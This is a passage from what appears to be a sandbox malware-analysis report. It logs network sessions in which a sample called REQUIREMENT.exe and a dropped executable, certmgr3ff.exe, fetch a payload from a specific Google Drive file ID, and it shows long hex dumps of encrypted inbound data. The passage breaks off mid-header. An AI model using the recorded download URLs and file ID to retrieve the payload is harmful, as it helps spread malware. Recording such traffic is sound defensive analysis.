5b 2d bb 27 5a 39 62 12 1d 9a fd 5d c1 2c d0 89 54 e9 e0 cd c6 c9 e5 3a 1e ae 1c 8a 0a 09 8e Data Ascii: )sDWGe\e l L1XcVF'haS -nO4:`(r+B!2rfjI~lTVUW\PAr/XW4FnfiR\e8bnZ}t3B&S\G&bmmu=i7em?C=4-d[-'Z9b],T:
2021-10-13 13:47:09 UTC	151	IN	Data Raw: 53 18 3e 2b 08 c5 b5 a0 cd 3b b3 ed f6 01 8e 59 52 4f f4 3f e3 ff 6b df 93 02 fc c6 8a 39 ae c4 bf 01 4a fc 05 86 a5 fa ce b9 fa 24 08 ea 6e 21 46 d8 cc 40 0f 52 56 63 ad ec d8 58 d2 0e 01 43 02 54 45 ed d0 f6 8b 2b 64 fd 1f 32 23 db d8 2c 22 d1 d2 61 40 01 8d ac d4 75 a9 5d 22 78 7b 64 29 c3 67 58 59 6a d8 79 7c 8c be cb 79 12 3c 9b 55 82 c2 1a db f0 ca 94 db 3e 89 11 c9 61 1a 94 45 93 e6 c3 e6 1b 6e 52 c3 24 a9 e9 bf 8c 90 e4 df b1 aa 2a c4 13 d9 2c c5 9a d4 ef 0e a7 75 b1 f3 35 bc f1 6c d8 75 d5 cb 3f ff 2c a9 ab 97 c9 4d 82 bb d4 56 d6 2b 4f 81 99 c5 28 0e 83 de f0 15 ab 89 8d b6 4e f8 55 16 a0 d2 d8 e5 9d ca c5 a5 5a b0 18 cf 3a 77 36 1c 46 11 33 3f f1 18 a6 0a 3b 29 aa a3 4a 61 93 27 0c 84 5d f3 a2 a3 6c 5f 03 02 29 15 fd 6f a1 13 d8 40 cf 8a 80 01 Data Ascii: S>+;YRO?k9J$n!F@RVcXCTE+d2#,"a@u]"x{d)gXYjy\|y<U>aEnR$*,u5lu?,MV+O(NUZ:w6F3?;)Ja']l_)o@
2021-10-13 13:47:09 UTC	152	IN	Data Raw: d9 35 7f b7 1c 53 ed 0f f2 f3 da 8b 41 59 48 15 21 56 c4 38 6e ee f9 da 6c 0e 89 93 99 80 e6 6d 35 ad 1b a2 71 69 2a b1 b9 49 76 4c 42 65 e4 70 69 c8 62 d8 01 09 76 b8 80 e5 41 61 7c a3 f0 2e ca 8f 23 01 e8 3d b9 78 83 97 b7 4e 54 70 5e fa f6 fc cf 0b 61 44 f6 73 e1 db b4 37 21 d3 63 86 d6 75 62 02 ee 34 af 58 54 d4 60 79 ab cc 38 1c ef c6 75 db 0f 4e 97 45 6e 3d 78 71 49 4f 22 56 f4 78 cc 5e 47 0d e9 25 a1 b0 f4 0a e4 bd 34 0f ca b1 15 b7 d6 fd 64 08 c3 7d 3a 3d 04 53 35 17 d4 8f 8c 5e 4e 0a 2b 18 d4 34 7d 81 2e 83 57 45 20 f8 12 f1 b7 a2 ba bb 3e 78 02 62 61 0b de bd d9 d6 12 e7 8c ac 25 ea 98 0b 9d ba 03 c2 a7 22 1d fb 84 1e ba 4c c6 cc 64 79 d2 d3 98 65 db c0 a1 5e 57 5a 16 83 59 eb 9e 89 6e 37 3f 31 33 0b a1 e0 af 25 2e a3 3d 6c c8 a5 cc 4c b2 25 f1 Data Ascii: 5SAYH!V8nlm5qi*IvLBepibvAa\|.#=xNTp^aDs7!cub4XT`y8uNEn=xqIO"Vx^G%4d}:=S5^N+4}.WE >xba%"Ldye^WZYn7?13%.=lL%
2021-10-13 13:47:09 UTC	153	IN	Data Raw: 45 26 42 30 e7 de f3 eb cb 65 42 7f 20 e3 eb 2b b8 68 ab ce ff 7a 05 e5 65 14 cb 17 a3 29 41 36 71 e0 f5 42 0a 9f 5f b6 6c 2e 33 4b f2 89 36 2d 8c 25 18 a8 01 79 98 2b b1 7a b6 9b 81 53 b3 ec 31 97 71 2d 86 6e d6 4d 2a 1a 81 96 73 ec 33 af 0b 28 2c 21 b3 bd 6e 53 a3 8c 7b e5 5a 9b b8 77 c4 08 a6 21 b8 27 e4 1f 61 2b 22 8c 9c be be 3e 12 6b 2a c7 26 9d 92 e4 10 32 fe 7b bf b7 0f 4f 88 4a 7f 06 d8 1a f3 0b 47 6e 7e 45 0e 09 74 cd 05 d1 d0 6c d4 7f 90 99 e4 d0 ac 1c 9a f8 6c 76 4f 8f 9e 4f fc 13 a3 33 d1 26 d5 2f 95 93 d9 f7 70 51 85 95 ed 79 d7 14 9e 3f 87 83 2d 1a 71 5c bc 34 de 39 8b 16 dd c2 67 1d c3 b2 7e 82 1f ff 26 eb 6b 09 ee 4b 37 e7 cf e2 35 ea 17 56 17 16 f1 ee ab ea fe 4c ae 2d fe 35 72 ef 4c e5 1d 84 9b 3c 7a 23 95 b1 e2 f2 21 f5 e8 f5 68 3a a3 Data Ascii: E&B0eB +hze)A6qB_l.3K6-%y+zS1q-nMs3(,!nS{Zw!'a+">k&2{OJGn~EtllvOO3&/pQy?-q\49g~&kK75VL-5rL<z#!h:
2021-10-13 13:47:09 UTC	155	IN	Data Raw: d9 5b c0 90 67 2f 35 78 19 9a c3 6b ed 42 94 13 7e 89 c9 95 29 89 02 3a 96 09 78 3b be 03 bc fc 00 c5 fe fb ed 5b d9 cb 4f 3f a5 a3 15 aa 15 2e 3a 68 7e c1 a1 7e c4 b9 7b 76 0e df 11 c9 24 c5 1f 82 e6 91 2a a5 0c 93 a4 e7 11 8a 4d f5 3c 0b b1 16 17 13 e4 2d 63 91 45 c2 81 4e 79 b5 51 b4 76 51 91 c9 2a 13 3b eb 3e 2d 25 91 12 49 02 99 5f ea d9 9a 7d 20 fb 57 ff 9c 25 1c f8 36 ba 55 77 26 c4 7d 07 8c 94 b8 d9 18 48 74 7b 60 f6 d3 61 3d 51 26 c9 6d d2 64 0e 26 2f 5a 32 50 eb 35 2f 9e 8d b4 d6 69 7b d9 57 a1 b3 bd 46 90 28 11 e7 19 40 89 30 71 3f ec db f0 18 52 8a a9 fc 64 eb 34 d8 48 92 31 84 a3 7d 22 b7 03 1d 5c 52 b6 b3 56 a4 cc a8 54 eb bf 7b c3 f4 5d db 82 8e 18 6d ed 01 ee 5e 76 fd b6 03 33 fa 9b 40 a1 04 17 d3 9d 29 41 dd e5 a5 3d 3a 3d 38 5a da d7 78 Data Ascii: [g/5xkB~):x;[O?.:h~~{v$M<-cENyQvQ;>-%I_} W%6Uw&}Ht{`a=Q&md&/Z2P5/i{WF(@0q?Rd4H1}"\RVT{]m^v3@)A=:=8Zx
2021-10-13 13:47:09 UTC	156	IN	Data Raw: 36 42 2e 04 e9 fc 16 1d 43 d6 5d 11 1c 16 ba e5 a9 a0 49 00 f2 45 8c ae 34 96 57 33 7c 70 0e 3e 16 2b f6 f2 7f e2 27 4e 28 03 5f 32 ee fb 3d a6 f4 db 2b fc 30 e5 ee 9c 11 ba 0d 65 41 81 93 c2 ac 88 4e e4 77 69 3d 81 f6 d6 07 98 7b f2 ee 15 1d 06 5e a5 49 11 31 e0 e2 c3 d4 41 aa 4d 21 77 1a 01 01 be 2f 9e 9b 44 74 f5 2f 1e b9 3d 5d f7 73 e5 b8 00 e1 3c f9 be e7 f4 10 df 63 52 5f bd 0e 16 46 74 4e 63 e1 04 73 8b b1 02 39 19 e2 bb 8e 59 3c e5 9b 13 e8 7c e0 e8 b9 8c b6 82 90 46 b8 a5 e1 f5 ab 1b c0 8a eb 6d 63 03 22 91 23 57 e3 26 2c a1 3c 52 c6 cb 23 04 67 00 79 a9 85 21 22 8c 30 78 13 ef b7 e6 19 97 fd 9a 3f 56 37 5a 96 32 17 ca c0 fb 12 1d 4e 25 4b f0 ff 58 c2 e0 a7 7e 5c ff 77 d6 38 de d1 53 ed dc 25 8f 6f 62 d5 47 ff 83 91 f6 68 2f e0 2e 1f 8a f2 97 d3 Data Ascii: 6B.C]IE4W3\|p>+'N(_2=+0eANwi={^I1AM!w/Dt/=]s<cR_FtNcs9Y<\|Fmc"#W&,<R#gy!"0x?V7Z2N%KX~\w8S%obGh/.
2021-10-13 13:47:09 UTC	157	IN	Data Raw: 6e 40 fd 22 60 5e d0 18 4f 84 d6 ab 7c e8 57 a6 2f 2a 6e 23 a3 47 52 57 e7 3d c8 83 0a 46 1e d1 02 2d 32 2e 8b 7d 83 7a 9b 55 09 69 69 af 76 3e 2d d0 8f 3b 61 be 55 aa 55 61 43 e1 2f 52 8d 5f 0b 09 22 2d 6a f9 71 ea f7 ab 4d d9 03 5d 1a 3d bb 65 55 eb 62 87 41 49 84 50 41 8c 4a 30 55 75 43 2b 23 0a 57 7e dc 71 e7 6a a3 77 5a 56 fe d9 30 39 34 f9 45 46 24 92 72 5c 2a 81 39 88 75 97 bc c0 ee d6 49 13 10 c0 16 66 4e bd 9f a1 e7 0c d4 31 d4 66 e7 de 97 84 b9 fb 3e 70 9f e1 50 96 ba 1e 3d 9b c1 1d 56 f5 08 22 12 f3 0d 36 d7 1a 1d 3b 93 75 01 24 cd 85 e8 a3 25 ad d2 ab 6f cc a4 09 df 39 cb 9e 10 fb 43 65 fc b2 65 af 71 76 36 d8 c7 c9 ec 03 47 83 aa 26 16 4c d1 6c 8a eb 17 52 a7 a3 e7 cf 24 1e 77 cc e4 08 2f fb 24 ec 8a 42 ac d4 4f 38 12 2b c0 6c 4d 7f 99 d5 e0 Data Ascii: n@"`^O\|W/n#GRW=F-2.}zUiiv>-;aUUaC/R_"-jqM]=eUbAIPAJ0UuC+#W~qjwZV094EF$r\9uIfN1f>pP=V"6;u$%o9Ceeqv6G&LlR$w/$BO8+lM
2021-10-13 13:47:09 UTC	159	IN	Data Raw: 79 af 9e 2d cd 94 5a ec 68 2a 6d 20 1f 50 5c c7 b1 67 da c2 04 36 f3 da 27 a4 e3 4b 56 4b b6 92 37 69 86 65 15 44 0b c8 9a c7 a4 dd be 2f cc 8a 71 83 90 f5 f3 09 bd ef c4 bb c8 52 c7 93 3a 30 2d 12 2c d0 bb 5a bb fa 3c 4c cf c6 6b 44 a0 e7 40 6f 2b a4 a2 2e 05 4d 5e dd 00 74 e5 70 a9 b1 a6 df c2 4c 03 69 03 ac ca 8e 6a f4 f9 06 11 c1 53 d9 c8 b0 96 11 db f9 80 93 dd 74 e5 1e 93 c5 59 47 5e 8b 69 68 2e 42 03 09 16 ce 21 53 42 93 81 7c 6b 77 0a 7d 2a 5a 89 20 e5 c1 73 95 d0 77 c6 1f 13 0f 99 22 ca 61 7b 6c df c6 a2 52 cc e3 f3 0b f3 fe 46 a1 07 7d 71 1d 9c d3 bf 0a de f1 94 d9 08 99 7a 2c f4 45 3c af d7 84 76 92 c0 b4 d2 d1 ba a1 47 a1 74 ad a5 6c 81 71 ca 79 5a f8 e7 18 ec 5d ee ec 1f a7 b9 c8 55 3a 7c c4 72 45 e6 53 d5 de 96 dc 3f f6 ac eb 7d 92 48 8b ca Data Ascii: y-Zhm P\g6'KVK7ieD/qR:0-,Z<LkD@o+.M^tpLijStYG^ih.B!SB\|kw}Z sw"a{lRF}qz,E<vGtlqyZ]U:\|rES?}H
2021-10-13 13:47:09 UTC	160	IN	Data Raw: ab cf f4 0f e8 d5 bd f2 cd 43 73 c8 b5 9f fb ba 6e 01 00 70 4e f7 9a 7e 8c 69 5a ed bc 2d fd 7b d2 88 dd bd 11 8a 9d a0 90 34 fa a9 e9 f9 65 5d 54 ef f9 f2 b6 a4 72 56 e4 f6 4b 41 a7 50 23 fe 9b 72 e4 0b 2f 24 f2 c4 6d 37 6b d3 bc 0d cd f8 f1 12 a7 96 8c 08 29 ba 7b 02 6e 4f 47 d4 5f a1 a8 2b b0 f1 87 2f 77 a1 02 5d b1 b1 70 ef 72 e0 a0 31 31 6e 1c a4 6a 5e 8d ef f0 b6 19 ce 62 17 c2 17 10 af 49 bf f0 d1 44 70 94 ed b5 d3 62 e8 e6 ad ae 8e eb 8c c1 88 ad d2 97 c4 39 e1 e4 00 b2 90 24 3d 58 ef d9 96 cc 2b 4e 87 43 80 cf 7e 85 c2 b4 e5 a3 6d d4 ed 4a 65 b2 e1 85 ab 85 a8 b3 be 97 cc 90 36 ba d2 69 4a 42 95 47 4e 87 cb 14 69 2b 49 95 27 ca 73 2c c7 19 2b 2d 91 8a d6 70 1b d0 37 25 68 9f 71 80 63 5d 6b be 3b b8 54 0b 9f ef 3a e4 7a 68 a2 f5 63 3a 86 b2 85 25 Data Ascii: CsnpN~iZ-{4e]TrVKAP#r/$m7k){nOG_+/w]pr11nj^bIDpb9$=X+NC~mJe6iJBGNi+I's,+-p7%hqc]k;T:zhc:%
2021-10-13 13:47:09 UTC	161	IN	Data Raw: 8d f7 b2 19 5d 80 ae 37 26 1f 47 da b4 c0 9f 33 aa 5d ed 1b e8 78 ff d8 00 f1 c3 12 fb 47 6c 7e c4 66 46 2e 92 d9 3d 43 78 b8 43 d8 d0 c7 26 ea 80 66 c5 5f d1 09 c4 16 1d 75 f4 25 3d e5 30 66 64 29 78 84 fe 36 d6 2b 00 a7 c3 2a cc 21 d6 26 2b bd d2 35 79 26 50 9d e0 d4 f6 75 14 ab e0 b2 57 79 22 e7 bc 60 b8 61 55 9c 41 d7 ce 7d f6 23 5a 9f df 79 3a 1b f1 a6 bc 76 ef 6a bd 63 22 0f 03 4d 0a 38 32 4d fc 81 8a 58 61 2e 0f 83 67 20 b3 86 54 a0 90 35 4c 65 f2 c6 d8 7d 9d 05 fa aa 93 3b d5 84 74 ef 81 14 02 d2 96 7a 36 0b 0e c0 f8 01 65 72 80 ec f1 7c 1c 57 e8 94 b1 f5 85 4f 99 f7 11 a5 1c 4b 00 4b 6c 31 7d 6f 1a 19 9f 59 3d 29 f1 51 07 40 d4 5f b2 3c 6c 9a 0a da 5c 97 4f 98 17 3e fb 33 d7 dc 8c 38 95 e1 8d aa 57 2d 4c 08 8a 8a 85 36 fe 37 cc 21 d6 37 f3 b2 c9 Data Ascii: ]7&G3]xGl~fF.=CxC&f_u%=0fd)x6+*!&+5y&PuWy"`aUA}#Zy:vjc"M82MXa.g T5Le};tz6er\|WOKKl1}oY=)Q@_<l\O>38W-L67!7
2021-10-13 13:47:09 UTC	162	IN	Data Raw: 96 9f 97 78 cd db 3e 87 d2 5c 13 95 f6 51 ac 43 82 d6 44 cb 4b 9c 37 59 dc 0e 2b d0 47 2e f5 3b ce 89 39 a2 ec 98 0d fc 38 35 50 8e e6 16 da b1 9b 5b 7a 0e 19 30 73 60 e1 06 b6 48 d2 99 e6 12 23 8a 59 68 06 29 d1 e2 c2 fb b5 70 2d f2 50 d1 66 64 4f 66 a6 ae 4b e3 96 75 7e b7 d1 26 f9 79 d6 9a 7f 05 fd e3 ac 95 0d 6d 2c d2 10 7c 55 46 d9 25 15 c4 bc 6e b5 d1 2a 46 7d f9 49 cd b8 e2 40 09 dc 47 f0 e1 73 c1 10 d5 59 74 2a 13 73 31 58 c2 df cf 3d b2 f4 57 3b 72 49 fd 84 59 2d e9 25 46 3c 02 78 e0 0a 60 ab eb 71 85 69 8f 09 fe 3d 85 ec 79 4a 64 34 99 8c a2 ae 83 ef 9d 4e e0 9b d5 1c ad e8 27 cf 82 e1 6f 5b d2 c8 a6 5f a4 b5 41 74 5c 8e da fb c7 1c 13 3c 81 1e 56 12 0b c9 a3 47 f5 75 08 d8 e1 da b9 d5 04 81 0e 76 f1 eb 6c a2 f3 c5 dc a4 ee 4b 12 18 d9 1f 4e 09 Data Ascii: x>\QCDK7Y+G.;985P[z0s`H#Yh)p-PfdOfKu~&ym,\|UF%nF}I@GsYts1X=W;rIY-%F<x`qi=yJd4N'o[_At\<VGuvlKN
2021-10-13 13:47:09 UTC	163	IN	Data Raw: 90 bf d6 62 72 d0 74 ff ea 44 d7 b2 5d bb c8 40 4e 86 57 81 a7 97 33 67 21 e0 55 bb f5 2f d7 67 50 b0 bc 5b 7a b0 15 67 6f bf 76 9c 0b 60 d0 ba 98 83 d9 f4 c6 6d a5 f3 17 9d 82 f6 48 ca 1f b1 aa c5 0e f9 a1 ce 90 2d 43 fc dd 66 aa f2 29 8a 04 6a 22 c3 57 93 30 79 3e b3 62 e8 46 42 db 52 3f e0 7e 2d 42 0e 58 02 85 ee 4f 6d 8e 3b c5 2e e5 33 6b 29 ba 1d 57 83 fa 54 63 bb dd 4b 89 eb 12 1f 95 27 c7 81 1c 28 3b 8a 67 8d 8d 1f 50 21 4e 30 30 55 3c 2a 42 d4 2d 9f 40 f1 b2 9f ec f4 10 9e ba b3 38 2a e3 27 17 45 99 d5 fd ef d9 fe 16 22 da c9 73 87 fc af 03 61 1f aa bb b4 92 2f 77 6d 23 37 45 92 03 bb 8d e8 f5 98 59 ae c6 eb 4e 8b 20 d3 7b ea c2 6a 71 41 ca 46 74 c0 d3 c5 48 86 0b f3 4f 08 91 d8 11 88 38 35 71 06 04 2c de a9 73 a1 4c ec 14 21 d1 5d f1 2e 70 8d 2d Data Ascii: brtD]@NW3g!U/gP[zgov`mH-Cf)j"W0y>bFBR?~-BXOm;.3k)WTcK'(;gP!N00U<B-@8'E"sa/wm#7EYN {jqAFtHO85q,sL!].p-
2021-10-13 13:47:09 UTC	164	IN	Data Raw: b2 d6 00 5c 49 d0 60 f5 ff 47 34 80 9a 04 b8 7d 09 2a cd a4 f1 59 6c 51 3e 50 d0 73 a4 da e3 23 1d 8a de 08 bf ca 5d a1 2d 4a 40 9f 32 55 8a fa 60 13 8f 8e 2d 87 e5 15 e0 44 a0 70 99 6f c7 2d 38 9f c5 f3 19 3b 37 fe a8 74 39 31 64 a7 aa 66 ef 11 91 9b f4 92 93 be 4d 6a 4e 98 55 4a 3c 68 d6 4a 49 2a a3 48 8a 29 a6 9b 4d 67 29 46 ba 42 92 64 ee 3c af e4 31 d2 89 4c ed 8c 56 ab 20 74 b0 02 28 89 57 00 e3 5a 0c 47 0a da 3a af 99 10 92 87 98 b6 94 61 fb 2f b6 d6 07 40 c5 b0 0c 2a 28 e9 5e 42 dd fe df b4 33 13 ae 49 52 a9 f4 db 15 dd 46 ee 2c 30 71 59 eb c5 11 ce b7 e5 00 46 0e 7f b5 3c 10 da 93 85 32 44 20 2e 86 ff 14 c3 7c 86 0b ad 40 1b ba 3b 7f 0c 7f 80 fc 7a 77 5a 0a e3 c1 da e7 89 f2 aa 22 48 50 2a 16 72 57 8c bb b0 ee 7b 2c d4 f0 6d 0d 41 80 ec 04 36 7d Data Ascii: \I`G4}YlQ>Ps#]-J@2U`-Dpo-8;7t91dfMjNUJ<hJIH)Mg)FBd<1LV t(WZG:a/@(^B3IRF,0qYF<2D .\|@;zwZ"HPrW{,mA6}
2021-10-13 13:47:09 UTC	166	IN	Data Raw: c1 9a 2c 76 59 1b 03 03 d3 73 73 73 c8 15 e8 06 b2 91 31 19 bb 31 f0 df 2e f1 3c 1a f5 72 61 38 a9 4a 6d a1 75 4a 83 3d 3c 62 86 4f b6 21 ee f0 b2 89 38 5a 02 59 37 80 ab ad f7 3f df dc f2 36 01 22 a8 e3 54 d5 2f 66 b6 a1 68 a1 c9 7e 8c b9 ca 35 2f 79 e6 85 af 39 67 da e4 70 b5 34 36 0a 1f a7 22 91 4d 79 49 10 88 60 e6 2c 6a e4 9c b5 f1 98 73 23 8f ea 81 b7 8b 26 69 fe c2 db ea e2 e8 51 e9 8c b9 54 bd 8d e1 ea b2 91 a9 79 8e 70 4e 03 1f 1d 05 97 ca 3c 7e 3b 15 b0 3c bd 02 d9 cd b2 18 00 5c b7 8c 97 24 18 f9 cd 9c 58 45 3b 8d 63 8a 47 83 dc 65 67 3a cd 3c 51 f8 54 20 b4 9c 1f 4e eb 7e 56 f0 76 1a 61 72 f0 06 96 ba ae d2 2f 52 a2 52 18 67 89 a3 81 1d ca 5a 0f 8f 0d 86 17 b6 e8 d2 22 b0 24 54 70 f9 44 5e 16 b4 30 14 d5 79 3e 15 70 ba 5a 59 96 2c a3 56 62 d6 Data Ascii: ,vYsss11.<ra8JmuJ=<bO!8ZY7?6"T/fh~5/y9gp46"MyI`,js#&iQTypN<~;<\$XE;cGeg:<QT N~Vvar/RRgZ"$TpD^0y>pZY,Vb
2021-10-13 13:47:09 UTC	167	IN	Data Raw: a9 4b 16 0f 57 f6 7e 53 ba a6 e5 68 e3 7c 9e 55 b5 6b 99 2f 94 46 7b 4b 14 e9 61 99 fb 0a 1e af f5 b6 54 1c 12 76 4b b3 69 a3 28 32 59 76 08 fd b9 8a 7c 25 ee 0c c2 05 f3 a4 d3 13 dc 24 98 3a b9 14 99 8c 93 f6 b5 6f 4f fd 66 c9 d8 fb 6f d7 19 b3 77 1a 88 4e 96 53 d9 71 7d 7e cb d1 69 ef f3 cd a9 b1 c5 45 35 88 98 f1 03 8b 13 72 12 f8 d2 87 48 e9 c1 d6 26 8b 01 7b 6a 7d 69 f8 7a 9e d4 66 85 a3 09 4e 2b 83 93 d8 45 1f d2 6c 6a e8 ea 88 33 c6 75 05 db da d9 02 50 e9 7c af ae 14 9f 4f 9d 27 84 37 8e 15 8a da b6 3b 0f 9e 3f b7 54 75 be 4e d8 a3 d2 f0 9e 3f f1 70 2e ad 76 b6 8c ee 30 ea 21 08 35 8e 96 d6 59 b8 c9 dc 4d c6 5f df 67 a2 06 32 ca 5b 94 06 d7 03 d9 9b 99 33 8a 3d f7 c9 74 5b 47 43 ca 07 04 94 14 69 17 93 2c 78 19 18 1a 17 bc 85 bf 19 c7 d7 7b 29 16 Data Ascii: KW~Sh\|Uk/F{KaTvKi(2Yv\|%$:oOfowNSq}~iE5rH&{j}izfN+Elj3uP\|O'7;?TuN?p.v0!5YM_g2[3=t[GCi,x{)
2021-10-13 13:47:09 UTC	168	IN	Data Raw: 63 00 43 e1 a3 a3 71 45 74 7e e7 b1 4f a3 01 01 d6 8c 99 e9 99 00 00 72 50 6c 63 97 3f 08 b0 9e 19 e9 6f 9d 25 0a e3 3b e6 ee c3 4d f4 f8 83 a0 bb a1 45 ff 90 33 ea f1 d2 02 e3 b2 ba c0 54 ed 31 a6 fa da 8c 9a 11 8e f5 1c 69 02 23 46 ff 31 a4 c2 1c 1a 1a 88 73 84 30 c9 6f 32 c4 17 e3 e4 e9 7d fc d2 73 ee d3 09 a6 54 68 0a c5 ff fc 8a d3 19 87 b3 76 ee 6e f9 10 80 06 17 e7 da 6d 28 29 31 94 1a 10 8a ad 80 97 bf 91 d8 a2 6a 2a 9e 19 5e cb 75 eb 80 1f 27 d1 d2 6f d2 25 b0 fc 56 34 8d 4a a7 35 68 8a a3 89 d8 e3 6a 90 b4 12 70 10 f0 da 1b fe 86 20 81 5d a6 7b 4c b8 b3 02 da 5d 7d 0a 84 d7 c9 2a a5 de 51 1d 59 48 4c 22 c0 34 d4 5a 02 58 3c 0b 3e 0f 87 9f ac 7a 28 6f 5c 84 f8 2c 83 bc b8 fd 7f ec aa 39 f1 de 15 18 2d e4 72 15 97 3b f6 0e 85 5f e5 3f 39 53 84 c4 Data Ascii: cCqEt~OrPlc?o%;ME3T1i#F1s0o2}sThvnm()1j^u'o%V4J5hjp ]{L]}QYHL"4ZX<>z(o\,9-r;_?9S

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49824	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:51:46 UTC	169	OUT	GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache Cookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
2021-10-13 13:51:47 UTC	169	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 13:51:46 GMT Location: https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download Content-Security-Policy: script-src 'nonce-K1hwybKVerhAsP3akJXn3A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-13 13:51:47 UTC	170	IN	Data Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 36 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 Data Ascii: 198<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-60-docs.googleusercontent.com/docs/secure
2021-10-13 13:51:47 UTC	171	IN	Data Raw: 73 63 2f 6f 72 34 38 69 68 73 6b 30 76 6d 69 66 35 69 66 75 6c 33 65 34 38 74 62 63 69 6e 6a 62 76 35 35 2f 70 65 6f 74 69 67 63 6a 75 75 74 31 63 72 36 67 30 38 64 35 31 33 64 36 6f 70 63 73 39 33 67 39 2f 31 36 33 34 31 33 33 30 37 35 30 30 30 2f 31 38 32 38 31 38 39 35 36 31 30 38 37 36 33 39 31 32 30 38 2f 30 34 32 32 35 37 39 36 32 37 32 31 32 36 34 37 34 30 31 33 5a 2f 31 63 61 76 6d 76 66 68 42 6b 52 6b 72 35 38 6b 50 62 50 38 79 6d 4d 50 4a 41 45 4a 5a 47 45 31 33 3f 65 3d 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: sc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download">here</A>.</BODY></HTML>
2021-10-13 13:51:47 UTC	171	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49825	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:51:47 UTC	171	OUT	GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0o-60-docs.googleusercontent.com Connection: Keep-Alive
2021-10-13 13:51:47 UTC	171	IN	HTTP/1.1 302 Found X-GUploader-UploadID: ADPycdt_J8bzcQvcvgwpWbrbeaVWtRKbwnbu9yJMjI9U-_WQkQnebOT86UjsON_mTg-_xgmseQm03uIwBddCVqoH5g Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, 